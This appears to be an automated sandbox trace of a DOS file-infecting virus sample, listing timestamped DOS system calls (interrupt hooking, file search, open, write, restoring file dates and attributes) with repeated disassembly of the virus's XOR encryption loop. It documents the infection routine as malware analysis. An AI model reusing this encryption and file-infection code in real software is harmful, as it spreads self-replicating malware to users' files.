Sample viewer

vx.netlux.org/Virus.DOS.E-Spoof.479

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:57.999232835Z 53 PC: 12b0d | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:06:58.014723071Z 37 PC: 12b1c | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:06:58.015836816Z 53 PC: 12b2f | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T23:06:58.016801608Z 37 PC: 12b38 | Set interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:06:58.018032151Z 53 PC: 12b3e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:06:58.019556139Z 37 PC: 12b4c | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:06:58.020474475Z 9 PC: 12b53 | Display string (String= '.�.��N.�. ��C.�.�9.�.�/.�.�%.�.�.�. �.�.')
2018-12-17T23:06:58.022507048Z 78 PC: 12b5f | Find first file
2018-12-17T23:06:58.028452246Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.333409321Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.339086127Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.346171074Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.354521489Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.356651286Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.359642443Z 64 PC: 12bc7 | Write file or device (Write 346 bytes on handle 5)
2018-12-17T23:06:58.368184241Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.369823744Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.377839372Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.384432853Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.386514886Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.396902806Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.403799783Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.410682692Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.413295254Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.416287009Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.419202418Z 64 PC: 12bc7 | Write file or device (Write 351 bytes on handle 5)
2018-12-17T23:06:58.42774223Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.429265718Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.436827746Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.446750462Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.44938916Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.458966892Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.465999929Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.472610547Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.473900547Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.476086699Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.479350178Z 64 PC: 12bc7 | Write file or device (Write 357 bytes on handle 5)
2018-12-17T23:06:58.487415532Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.490014786Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.498004812Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.508243943Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.510941221Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.520647217Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.527655424Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.533795711Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.535508608Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.537627733Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.54008401Z 64 PC: 12bc7 | Write file or device (Write 362 bytes on handle 5)
2018-12-17T23:06:58.548121895Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.549495999Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.556768021Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.567027178Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.568703595Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.576362983Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.581477213Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.586012327Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.587357744Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.5910427Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.594108338Z 64 PC: 12bc7 | Write file or device (Write 368 bytes on handle 5)
2018-12-17T23:06:58.602358689Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.604732895Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.61226981Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.621910435Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.624859324Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.634422266Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.640775737Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.647381493Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.648675068Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.650879319Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.654641622Z 64 PC: 12bc7 | Write file or device (Write 368 bytes on handle 5)
2018-12-17T23:06:58.662313049Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.663634591Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.671288587Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.680714183Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.683144815Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.692966083Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.699263502Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.705351086Z 66 PC: 12b90 | Move file pointer
2018-12-17T23:06:58.707066933Z 44 PC: 12b93 | Get time 0x12b93: cmp dl, 0
0x12b96: je 0x12b90
0x12b98: mov byte ptr [0x1c0], dl
0x12b9c: mov cx, 0x119
0x12b9f: add cl, dl
0x12ba1: push dx
0x12ba2: mov di, 0x2e7
0x12ba5: mov si, 0x1c6
0x12ba8: mov al, byte ptr [si]
0x12baa: xor al, dl
0x12bac: mov byte ptr [di], al
0x12bae: inc si
0x12baf: inc di
0x12bb0: loop 0x12ba8
0x12bb2: mov ah, 0x40
0x12bb4: mov cx, 0xc6
0x12bb7: mov dx, 0x100
0x12bba: int3
0x12bbb: mov ah, 0x40
0x12bbd: mov cx, 0x119
2018-12-17T23:06:58.70932922Z 64 PC: 12bbb | Write file or device (Write 198 bytes on handle 5)
2018-12-17T23:06:58.711963994Z 64 PC: 12bc7 | Write file or device (Write 373 bytes on handle 5)
2018-12-17T23:06:58.720349591Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.721753049Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.729021463Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.738729787Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.741358213Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.751320902Z 61 PC: 12b74 | Open file (Filename = '')
2018-12-17T23:06:58.758188363Z 63 PC: 12b80 | Read file or device (Read 2 bytes on handle 5)
2018-12-17T23:06:58.760558588Z 87 PC: 12bd3 | Get or set file date and time
2018-12-17T23:06:58.762224793Z 62 PC: 12bd6 | Close file
2018-12-17T23:06:58.771387651Z 67 PC: 12c02 | Get or set file attributes
2018-12-17T23:06:58.783778996Z 79 PC: 12be2 | Find next file
2018-12-17T23:06:58.786049845Z 37 PC: 12beb | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-17T23:06:58.787712664Z 37 PC: 12bf2 | Set interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:06:58.788645888Z 76 PC: 12bf6 | Terminate with return code (Return code = '0')